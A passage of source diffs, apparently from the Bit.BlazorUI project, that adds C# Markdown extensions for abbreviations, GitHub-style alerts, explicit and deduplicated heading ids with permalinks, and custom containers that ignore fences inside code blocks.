+        if (definitions.Count == 0) return;
+
+        // Longest first, so "HTML5" wins over "HTML" where both are defined.
+        var terms = definitions.Keys.OrderByDescending(k => k.Length).ToArray();
+
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is not BitMarkdownTextNode text) continue;
+
+                var replacement = Split(text.Text, terms, definitions);
+                if (replacement is null) continue;
+
+                list.RemoveAt(i);
+                foreach (var node in replacement) list.Insert(i++, node);
+                i--;
+            }
+        });
+    }
+
+    // Splits one run of text around the abbreviations it holds, returning null when it holds none.
+    private static List<BitMarkdownNode>? Split(string text, string[] terms, Dictionary<string, string> definitions)
+    {
+        List<BitMarkdownNode>? result = null;
+        int last = 0;
+        int i = 0;
+
+        while (i < text.Length)
+        {
+            string? match = null;
+            foreach (var term in terms)
+            {
+                if (i + term.Length > text.Length) continue;
+                if (string.CompareOrdinal(text, i, term, 0, term.Length) != 0) continue;
+                if (IsWholeWord(text, i, term.Length) is false) continue;
+                match = term;
+                break;
+            }
+
+            if (match is null)
+            {
+                i++;
+                continue;
+            }
+
+            result ??= [];
+            if (i > last) result.Add(new BitMarkdownTextNode(text[last..i]));
+            result.Add(new BitMarkdownAbbreviationNode { Text = match, Title = definitions[match] });
+            i += match.Length;
+            last = i;
+        }
+
+        if (result is null) return null;
+
+        if (last < text.Length) result.Add(new BitMarkdownTextNode(text[last..]));
+        return result;
+    }
+
+    // A term only counts where it stands on its own: "HTML" in "HTMLElement" is not the
+    // abbreviation, and expanding it there would put an <abbr> around half a word.
+    private static bool IsWholeWord(string text, int start, int length)
+    {
+        if (start > 0 && IsWordCharacter(text[start - 1])) return false;
+
+        int end = start + length;
+        return end >= text.Length || IsWordCharacter(text[end]) is false;
+    }
+
+    private static bool IsWordCharacter(char c) => char.IsLetterOrDigit(c) || c == '_';
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationDefinitionParser.cs
@@ -1,0 +1,43 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses abbreviation definitions: <c>*[HTML]: HyperText Markup Language</c>, written anywhere in
+/// the document.
+/// </summary>
+public sealed class BitMarkdownAbbreviationDefinitionParser : BitMarkdownBlockParser
+{
+    // Claimed before the link reference definition parser (5) and long before the list parser,
+    // whose "*" marker the line also starts with.
+    public override int Order => 3;
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        string line = lines[state.Line];
+
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+
+        int p = 0;
+        while (p < line.Length && line[p] == ' ') p++;
+        if (p + 1 >= line.Length || line[p] != '*' || line[p + 1] != '[') return false;
+
+        int labelEnd = BitMarkdownLinkHelpers.FindLabelEnd(line, p + 1);
+        if (labelEnd < 0) return false;
+        if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
+
+        string label = line.Substring(p + 2, labelEnd - p - 2).Trim();
+        if (label.Length is 0 or > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+
+        string title = line[(labelEnd + 2)..].Trim();
+        // A definition with nothing on the right explains nothing; it is ordinary text.
+        if (title.Length == 0) return false;
+
+        output.Add(new BitMarkdownAbbreviationDefinitionNode
+        {
+            Label = label,
+            Title = BitMarkdownEntities.Decode(title)
+        });
+        state.Line++;
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationDefinitionParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationDefinitionParser.cs
@@ -10,10 +10,31 @@ public sealed class BitMarkdownAbbreviationDefinitionParser : BitMarkdownBlockPa
     // whose "*" marker the line also starts with.
     public override int Order => 3;
 
+    // A definition ends the paragraph above it, the way markdown-it's own abbreviation rule does.
+    // Written on the line right after a sentence - the natural place to explain a term just used -
+    // it would otherwise be absorbed into that paragraph and printed as raw text, expanding nothing.
+    public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
+        => TryReadDefinition(state.Lines[lineIndex], out _, out _);
+
     public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
     {
-        var lines = state.Lines;
-        string line = lines[state.Line];
+        if (TryReadDefinition(state.Lines[state.Line], out string label, out string title) is false) return false;
+
+        output.Add(new BitMarkdownAbbreviationDefinitionNode
+        {
+            Label = label,
+            Title = BitMarkdownEntities.Decode(title)
+        });
+        state.Line++;
+        return true;
+    }
+
+    // Reads a "*[LABEL]: expansion" line. One reader for both the acceptance test and the parse, so
+    // the line that ends a paragraph and the line that becomes a definition cannot come apart.
+    private static bool TryReadDefinition(string line, out string label, out string title)
+    {
+        label = string.Empty;
+        title = string.Empty;
 
         if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
 
@@ -25,19 +46,15 @@ public sealed class BitMarkdownAbbreviationDefinitionParser : BitMarkdownBlockPa
         if (labelEnd < 0) return false;
         if (labelEnd + 1 >= line.Length || line[labelEnd + 1] != ':') return false;
 
-        string label = line.Substring(p + 2, labelEnd - p - 2).Trim();
-        if (label.Length is 0 or > BitMarkdownLinkHelpers.MaxLabelLength) return false;
+        string read = line.Substring(p + 2, labelEnd - p - 2).Trim();
+        if (read.Length is 0 or > BitMarkdownLinkHelpers.MaxLabelLength) return false;
 
-        string title = line[(labelEnd + 2)..].Trim();
+        string expansion = line[(labelEnd + 2)..].Trim();
         // A definition with nothing on the right explains nothing; it is ordinary text.
-        if (title.Length == 0) return false;
+        if (expansion.Length == 0) return false;
 
-        output.Add(new BitMarkdownAbbreviationDefinitionNode
-        {
-            Label = label,
-            Title = BitMarkdownEntities.Decode(title)
-        });
-        state.Line++;
+        label = read;
+        title = expansion;
         return true;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationExtension.cs
@@ -1,0 +1,16 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables abbreviations: <c>*[HTML]: HyperText Markup Language</c> declares a term once, and
+/// every whole-word occurrence of it in the text becomes an <c>&lt;abbr&gt;</c> carrying the
+/// expansion as its tooltip and as what a screen reader can read out.
+/// </summary>
+public sealed class BitMarkdownAbbreviationExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownAbbreviationDefinitionParser());
+        builder.AstProcessors.Add(new BitMarkdownAbbreviationAstProcessor());
+        builder.Renderers.Add(new BitMarkdownAbbreviationRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationNodes.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationNodes.cs
@@ -1,0 +1,26 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// An abbreviation definition (<c>*[HTML]: HyperText Markup Language</c>). Like a link reference
+/// definition it declares something rather than saying it, so it renders nothing;
+/// <see cref="BitMarkdownAbbreviationAstProcessor"/> removes it and expands the term wherever the
+/// document uses it.
+/// </summary>
+public sealed class BitMarkdownAbbreviationDefinitionNode : BitMarkdownNode
+{
+    /// <summary>The abbreviated term, matched in the text exactly as written here.</summary>
+    public string Label { get; init; } = string.Empty;
+
+    /// <summary>What the term stands for, which becomes the <c>title</c> of every expansion.</summary>
+    public string Title { get; init; } = string.Empty;
+}
+
+/// <summary>An expanded abbreviation, rendered as <c>&lt;abbr title="..."&gt;</c>.</summary>
+public sealed class BitMarkdownAbbreviationNode : BitMarkdownNode
+{
+    /// <summary>The term as it appears in the text.</summary>
+    public string Text { get; init; } = string.Empty;
+
+    /// <summary>What it stands for.</summary>
+    public string Title { get; init; } = string.Empty;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAbbreviationRenderer.cs
@@ -1,0 +1,29 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders an expanded abbreviation as <c>&lt;abbr title="..."&gt;</c>, and a definition as
+/// nothing at all.
+/// </summary>
+public sealed class BitMarkdownAbbreviationRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is
+        BitMarkdownAbbreviationNode or BitMarkdownAbbreviationDefinitionNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        if (node is not BitMarkdownAbbreviationNode abbreviation)
+        {
+            // A definition declares a term; it is not part of the rendered document. The AST
+            // processor normally removes it before this point.
+            return;
+        }
+
+        b.OpenElement(0, "abbr");
+        b.AddAttribute(1, "title", abbreviation.Title);
+        b.AddContent(2, abbreviation.Text);
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertAstProcessor.cs
@@ -1,0 +1,64 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Turns a block quote whose first line is <c>[!NOTE]</c> (or <c>[!TIP]</c>,
+/// <c>[!IMPORTANT]</c>, <c>[!WARNING]</c>, <c>[!CAUTION]</c>) into a
+/// <see cref="BitMarkdownAlertNode"/>. The marker must be alone on that line, exactly as
+/// GitHub requires; anything else stays an ordinary block quote.
+/// </summary>
+public sealed class BitMarkdownAlertAstProcessor : BitMarkdownAstProcessor
+{
+    // After the core reference resolver, whose text merging is what leaves the marker as a
+    // single text node to match against.
+    public override int Order => 20;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is not BitMarkdownBlockquoteNode quote) continue;
+                if (TryConvert(quote) is { } alert) list[i] = alert;
+            }
+        });
+    }
+
+    private static BitMarkdownAlertNode? TryConvert(BitMarkdownBlockquoteNode quote)
+    {
+        if (quote.Children.FirstOrDefault() is not BitMarkdownParagraphNode paragraph) return null;
+        if (paragraph.Inlines.FirstOrDefault() is not BitMarkdownTextNode marker) return null;
+        if (TryParseKind(marker.Text, out var kind) is false) return null;
+
+        // The marker owns its whole line: the very next inline must be the line break that
+        // ends it, or the paragraph must consist of nothing else.
+        bool hasBreak = paragraph.Inlines.Count > 1 && paragraph.Inlines[1] is BitMarkdownLineBreakNode;
+        if (paragraph.Inlines.Count > 1 && hasBreak is false) return null;
+
+        paragraph.Inlines.RemoveAt(0);
+        if (hasBreak) paragraph.Inlines.RemoveAt(0);
+
+        var alert = new BitMarkdownAlertNode { Kind = kind };
+        // A "> [!NOTE]" with nothing after it leaves an empty paragraph behind.
+        alert.Children.AddRange(paragraph.Inlines.Count == 0 ? quote.Children.Skip(1) : quote.Children);
+        return alert;
+    }
+
+    private static bool TryParseKind(string text, out BitMarkdownAlertKind kind)
+    {
+        kind = default;
+
+        var span = text.AsSpan().Trim();
+        if (span.Length < 4 || span[0] != '[' || span[1] != '!' || span[^1] != ']') return false;
+
+        var name = span[2..^1];
+        if (name.Equals("NOTE", StringComparison.OrdinalIgnoreCase)) kind = BitMarkdownAlertKind.Note;
+        else if (name.Equals("TIP", StringComparison.OrdinalIgnoreCase)) kind = BitMarkdownAlertKind.Tip;
+        else if (name.Equals("IMPORTANT", StringComparison.OrdinalIgnoreCase)) kind = BitMarkdownAlertKind.Important;
+        else if (name.Equals("WARNING", StringComparison.OrdinalIgnoreCase)) kind = BitMarkdownAlertKind.Warning;
+        else if (name.Equals("CAUTION", StringComparison.OrdinalIgnoreCase)) kind = BitMarkdownAlertKind.Caution;
+        else return false;
+
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertExtension.cs
@@ -1,0 +1,14 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables GitHub alerts: <c>&gt; [!NOTE]</c>, <c>&gt; [!TIP]</c>, <c>&gt; [!IMPORTANT]</c>,
+/// <c>&gt; [!WARNING]</c> and <c>&gt; [!CAUTION]</c> block quotes render as titled callouts.
+/// </summary>
+public sealed class BitMarkdownAlertExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.AstProcessors.Add(new BitMarkdownAlertAstProcessor());
+        builder.Renderers.Add(new BitMarkdownAlertRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertKind.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertKind.cs
@@ -1,0 +1,20 @@
+namespace Bit.BlazorUI;
+
+/// <summary>The five GitHub alert kinds, in the order GitHub documents them.</summary>
+public enum BitMarkdownAlertKind
+{
+    /// <summary>Useful information the reader should notice even when skimming.</summary>
+    Note,
+
+    /// <summary>Optional advice for doing something better.</summary>
+    Tip,
+
+    /// <summary>Key information the reader needs to succeed.</summary>
+    Important,
+
+    /// <summary>Urgent information that needs immediate attention to avoid a problem.</summary>
+    Warning,
+
+    /// <summary>Advice about the risks or negative outcomes of an action.</summary>
+    Caution
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertNode.cs
@@ -1,0 +1,16 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A GitHub alert: a block quote whose first line is one of <c>[!NOTE]</c>, <c>[!TIP]</c>,
+/// <c>[!IMPORTANT]</c>, <c>[!WARNING]</c> or <c>[!CAUTION]</c>.
+/// </summary>
+public sealed class BitMarkdownAlertNode : BitMarkdownNode
+{
+    /// <summary>Which of the five alert kinds this is.</summary>
+    public BitMarkdownAlertKind Kind { get; init; }
+
+    /// <summary>The alert's content, i.e. the block quote without its marker line.</summary>
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertRenderer.cs
@@ -1,0 +1,30 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders a <see cref="BitMarkdownAlertNode"/> with the class names GitHub uses, so the
+/// stylesheet can colour each kind without the renderer knowing about the palette.
+/// </summary>
+public sealed class BitMarkdownAlertRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownAlertNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var alert = (BitMarkdownAlertNode)node;
+        string kind = alert.Kind.ToString().ToLowerInvariant();
+
+        b.OpenElement(0, "div");
+        b.AddAttribute(1, "class", $"markdown-alert markdown-alert-{kind}");
+        // The kind is announced rather than left to colour alone, which a screen reader
+        // and a monochrome print both miss.
+        b.OpenElement(2, "p");
+        b.AddAttribute(3, "class", "markdown-alert-title");
+        b.AddContent(4, alert.Kind.ToString());
+        b.CloseElement();
+        r.WriteNodes(b, alert.Children);
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAlertRenderer.cs
@@ -22,7 +22,7 @@ public sealed class BitMarkdownAlertRenderer : BitMarkdownNodeRenderer
         // and a monochrome print both miss.
         b.OpenElement(2, "p");
         b.AddAttribute(3, "class", "markdown-alert-title");
-        b.AddContent(4, alert.Kind.ToString());
+        b.AddContent(4, r.Texts.GetAlertTitle(alert.Kind));
         b.CloseElement();
         r.WriteNodes(b, alert.Children);
         b.CloseElement();

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierAstProcessor.cs
@@ -6,29 +6,97 @@ namespace Bit.BlazorUI;
 /// Assigns a URL-friendly <c>id</c> (GitHub-style slug) to every heading, ensuring
 /// uniqueness within the document so headings can be deep-linked.
 /// </summary>
+/// <remarks>
+/// A heading may also name its own id, by ending with <c>{#the-id}</c>. That is worth doing for a
+/// heading whose slug would otherwise change with its wording, since every link already pointing
+/// at it breaks the moment it does. The marker is removed from the rendered text.
+/// </remarks>
 public sealed class BitMarkdownAutoIdentifierAstProcessor : BitMarkdownAstProcessor
 {
+    /// <summary>Creates a processor that only assigns ids.</summary>
+    public BitMarkdownAutoIdentifierAstProcessor() { }
+
+    /// <summary>
+    /// Creates a processor that also appends a <see cref="BitMarkdownHeadingAnchorNode"/> permalink
+    /// to every heading when <paramref name="anchorLinks"/> is <c>true</c>.
+    /// </summary>
+    public BitMarkdownAutoIdentifierAstProcessor(bool anchorLinks) => AnchorLinks = anchorLinks;
+
+    /// <summary>True when each heading also gets a visible permalink.</summary>
+    public bool AnchorLinks { get; }
+
     public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
     {
         var used = new Dictionary<string, int>();
         foreach (var heading in BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownHeadingNode>())
         {
-            string baseSlug = Slugify(BitMarkdownInlineHelpers.PlainText(heading.Inlines));
-            if (baseSlug.Length == 0) baseSlug = "section";
+            // An id already on the node is the author's - set by hand, or by a previous run over
+            // this same tree - and is kept as it is. It is still claimed here, so a later heading
+            // that slugs to the same text is suffixed instead of duplicating it.
+            string? slug = string.IsNullOrEmpty(heading.Id) ? TakeExplicitId(heading) : heading.Id;
 
-            string slug = baseSlug;
-            if (used.TryGetValue(baseSlug, out int count))
+            if (string.IsNullOrEmpty(slug))
             {
-                do
+                string baseSlug = Slugify(BitMarkdownInlineHelpers.PlainText(heading.Inlines));
+                if (baseSlug.Length == 0) baseSlug = "section";
+
+                slug = baseSlug;
+                if (used.TryGetValue(baseSlug, out int count))
                 {
-                    slug = $"{baseSlug}-{++count}";
+                    do
+                    {
+                        slug = $"{baseSlug}-{++count}";
+                    }
+                    while (used.ContainsKey(slug));
+                    used[baseSlug] = count;
                 }
-                while (used.ContainsKey(slug));
-                used[baseSlug] = count;
             }
-            used[slug] = 0;
+
+            used.TryAdd(slug, 0);
+            bool alreadyAnchored = heading.Id == slug && heading.Inlines.Count > 0
+                                   && heading.Inlines[^1] is BitMarkdownHeadingAnchorNode;
             heading.Id = slug;
+
+            if (AnchorLinks && alreadyAnchored is false)
+            {
+                // Appended after the slug is computed, so the anchor never feeds its own "#" back
+                // into the heading text the slug is derived from.
+                heading.Inlines.Add(new BitMarkdownHeadingAnchorNode
+                {
+                    Id = slug,
+                    HeadingText = BitMarkdownInlineHelpers.PlainText(heading.Inlines)
+                });
+            }
         }
+    }
+
+    /// <summary>
+    /// Reads and removes a trailing <c>{#the-id}</c> from the heading's text, returning the id it
+    /// named or <c>null</c> when it carried none.
+    /// </summary>
+    private static string? TakeExplicitId(BitMarkdownHeadingNode heading)
+    {
+        if (heading.Inlines.Count == 0) return null;
+        if (heading.Inlines[^1] is not BitMarkdownTextNode last) return null;
+
+        string text = last.Text;
+        int end = text.Length;
+        while (end > 0 && char.IsWhiteSpace(text[end - 1])) end--;
+        if (end < 4 || text[end - 1] != '}') return null;
+
+        int open = text.LastIndexOf('{', end - 1);
+        if (open < 0 || open + 2 >= end || text[open + 1] != '#') return null;
+
+        string id = text[(open + 2)..(end - 1)].Trim();
+        // An id has to be usable in a fragment; anything with whitespace or a brace in it was not
+        // meant as one.
+        if (id.Length == 0 || id.Any(c => char.IsWhiteSpace(c) || c is '{' or '}' or '#')) return null;
+
+        last.Text = text[..open].TrimEnd();
+        // A heading that was nothing but its id marker leaves an empty run behind.
+        if (last.Text.Length == 0) heading.Inlines.RemoveAt(heading.Inlines.Count - 1);
+
+        return id;
     }
 
     private static string Slugify(string text)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierAstProcessor.cs
@@ -9,7 +9,9 @@ namespace Bit.BlazorUI;
 /// <remarks>
 /// A heading may also name its own id, by ending with <c>{#the-id}</c>. That is worth doing for a
 /// heading whose slug would otherwise change with its wording, since every link already pointing
-/// at it breaks the moment it does. The marker is removed from the rendered text.
+/// at it breaks the moment it does. The marker is removed from the rendered text. A named id is
+/// uniquified like a generated one when something earlier in the document already took it - two
+/// headings with one id is invalid markup either way.
 /// </remarks>
 public sealed class BitMarkdownAutoIdentifierAstProcessor : BitMarkdownAstProcessor
 {
@@ -37,22 +39,15 @@ public sealed class BitMarkdownAutoIdentifierAstProcessor : BitMarkdownAstProces
 
             if (string.IsNullOrEmpty(slug))
             {
-                string baseSlug = Slugify(BitMarkdownInlineHelpers.PlainText(heading.Inlines));
-                if (baseSlug.Length == 0) baseSlug = "section";
-
-                slug = baseSlug;
-                if (used.TryGetValue(baseSlug, out int count))
-                {
-                    do
-                    {
-                        slug = $"{baseSlug}-{++count}";
-                    }
-                    while (used.ContainsKey(slug));
-                    used[baseSlug] = count;
-                }
+                slug = Slugify(BitMarkdownInlineHelpers.PlainText(heading.Inlines));
+                if (slug.Length == 0) slug = "section";
             }
 
-            used.TryAdd(slug, 0);
+            // Suffixed if it is taken, whether it was generated or spelled out: two headings
+            // carrying one id is invalid markup, and every link to it - the permalinks this
+            // processor adds included - would land on whichever of them the browser found first.
+            slug = Claim(used, slug);
+
             bool alreadyAnchored = heading.Id == slug && heading.Inlines.Count > 0
                                    && heading.Inlines[^1] is BitMarkdownHeadingAnchorNode;
             heading.Id = slug;
@@ -68,6 +63,25 @@ public sealed class BitMarkdownAutoIdentifierAstProcessor : BitMarkdownAstProces
                 });
             }
         }
+    }
+
+    // Takes the id, suffixing it with "-2", "-3", ... until it is one nothing else has taken, and
+    // records it as taken.
+    private static string Claim(Dictionary<string, int> used, string baseSlug)
+    {
+        string slug = baseSlug;
+        if (used.TryGetValue(baseSlug, out int count))
+        {
+            do
+            {
+                slug = $"{baseSlug}-{++count}";
+            }
+            while (used.ContainsKey(slug));
+            used[baseSlug] = count;
+        }
+
+        used.TryAdd(slug, 0);
+        return slug;
     }
 
     /// <summary>

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierExtension.cs
@@ -18,6 +18,9 @@ public sealed class BitMarkdownAutoIdentifierExtension : IBitMarkdownExtension
     /// <summary>True when each heading also gets a visible permalink.</summary>
     public bool AnchorLinks { get; }
 
+    public bool IsSameConfigurationAs(IBitMarkdownExtension other)
+        => other is BitMarkdownAutoIdentifierExtension e && e.AnchorLinks == AnchorLinks;
+
     public void Setup(BitMarkdownPipelineBuilder builder)
     {
         builder.AstProcessors.Add(new BitMarkdownAutoIdentifierAstProcessor(AnchorLinks));

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoIdentifierExtension.cs
@@ -1,8 +1,29 @@
 namespace Bit.BlazorUI;
 
-/// <summary>Enables automatic heading <c>id</c> slugs.</summary>
+/// <summary>
+/// Enables automatic heading <c>id</c> slugs, and optionally the permalink anchor that lets a
+/// reader copy a link to a section.
+/// </summary>
 public sealed class BitMarkdownAutoIdentifierExtension : IBitMarkdownExtension
 {
+    /// <summary>Gives every heading an id, with no visible anchor.</summary>
+    public BitMarkdownAutoIdentifierExtension() { }
+
+    /// <summary>
+    /// Gives every heading an id and, when <paramref name="anchorLinks"/> is <c>true</c>, appends a
+    /// permalink to it.
+    /// </summary>
+    public BitMarkdownAutoIdentifierExtension(bool anchorLinks) => AnchorLinks = anchorLinks;
+
+    /// <summary>True when each heading also gets a visible permalink.</summary>
+    public bool AnchorLinks { get; }
+
     public void Setup(BitMarkdownPipelineBuilder builder)
-        => builder.AstProcessors.Add(new BitMarkdownAutoIdentifierAstProcessor());
+    {
+        builder.AstProcessors.Add(new BitMarkdownAutoIdentifierAstProcessor(AnchorLinks));
+        if (AnchorLinks)
+        {
+            builder.Renderers.Add(new BitMarkdownHeadingAnchorRenderer());
+        }
+    }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoLinkAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownAutoLinkAstProcessor.cs
@@ -1,4 +1,4 @@
-using System.Text.RegularExpressions;
+﻿using System.Text.RegularExpressions;
 
 namespace Bit.BlazorUI;
 
@@ -100,7 +100,7 @@ public sealed partial class BitMarkdownAutoLinkAstProcessor : BitMarkdownAstProc
 
             // Route through the shared sanitizer so autolinks get the same URL safety
             // treatment as explicit links/images.
-            var link = new BitMarkdownLinkNode { Url = BitMarkdownUrlSanitizer.Sanitize(href, isImage: false) };
+            var link = new BitMarkdownLinkNode { Url = BitMarkdownUrlSanitizer.Sanitize(href, isImage: false), IsAutoLink = true };
             link.Children.Add(new BitMarkdownTextNode(matched));
             result.Add(link);
             // Advance only past the characters kept in the link so any trimmed

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerBlockParser.cs
@@ -1,13 +1,14 @@
 namespace Bit.BlazorUI;
 
 /// <summary>
-/// Parses custom containers: a fence of three or more colons, optionally followed by a name and a
-/// title, up to a closing fence of at least as many colons carrying no info of its own.
+/// Parses custom containers: a fence of three or more colons followed by a name and an optional
+/// title, up to a closing fence of colons carrying no info of its own.
 /// </summary>
 /// <remarks>
 /// Containers nest: an inner fence that opens (it carries a name) is balanced against its own
 /// closing fence, so <c>:::tip</c> inside <c>:::note</c> ends where it should rather than closing
-/// the outer one.
+/// the outer one. That is also why the name is required to open one: an info-less fence is always a
+/// closer, and a stray one would otherwise claim every line after it.
 /// </remarks>
 public sealed class BitMarkdownContainerBlockParser : BitMarkdownBlockParser
 {
@@ -16,40 +17,92 @@ public sealed class BitMarkdownContainerBlockParser : BitMarkdownBlockParser
     public override int Order => 45;
 
     public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
-        => ReadFence(state.Lines[lineIndex], out _, out _) > 0;
+        => Opens(state.Lines[lineIndex]);
 
     public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
     {
         var lines = state.Lines;
         if (ReadFence(lines[state.Line], out string name, out string? title) == 0) return false;
+        // Only a fence carrying a name opens a container. An info-less ":::" is a closer, and
+        // reading a stray or unmatched one as an opening fence would hand it every line that
+        // follows - the rest of a block quote, or the rest of the document.
+        if (name.Length == 0) return false;
 
         var inner = new List<string>();
         int depth = 1;
         int i = state.Line + 1;
+        // A code fence's content is not Markdown, so a ":::" written inside one is sample text
+        // rather than this container's closer.
+        string? codeFence = null;
         for (; i < lines.Count; i++)
         {
-            int fence = ReadFence(lines[i], out string innerName, out _);
-            if (fence > 0 && innerName.Length > 0)
+            string line = lines[i];
+
+            if (ReadCodeFence(line, out string codeMarker, out bool codeHasInfo))
             {
-                // A nested opening fence: keep it in the content and balance it.
-                depth++;
-            }
-            else if (fence > 0 && innerName.Length == 0)
-            {
-                // Any fence carrying no info closes one level, whatever its length. Balancing by
-                // nesting rather than by fence length is what lets "::::note" hold ":::tip" - the
-                // pattern a longer outer fence exists for - close in the right order.
-                depth--;
-                if (depth == 0) { i++; break; }
+                if (codeFence is null) codeFence = codeMarker;
+                else if (codeHasInfo is false && codeMarker[0] == codeFence[0]
+                         && codeMarker.Length >= codeFence.Length) codeFence = null;
+                inner.Add(line);
+                continue;
             }
 
-            inner.Add(lines[i]);
+            if (codeFence is null)
+            {
+                int fence = ReadFence(line, out string innerName, out _);
+                if (fence > 0 && innerName.Length > 0)
+                {
+                    // A nested opening fence: keep it in the content and balance it.
+                    depth++;
+                }
+                else if (fence > 0 && innerName.Length == 0)
+                {
+                    // Any fence carrying no info closes one level, whatever its length. Balancing by
+                    // nesting rather than by fence length is what lets "::::note" hold ":::tip" - the
+                    // pattern a longer outer fence exists for - close in the right order.
+                    depth--;
+                    if (depth == 0) { i++; break; }
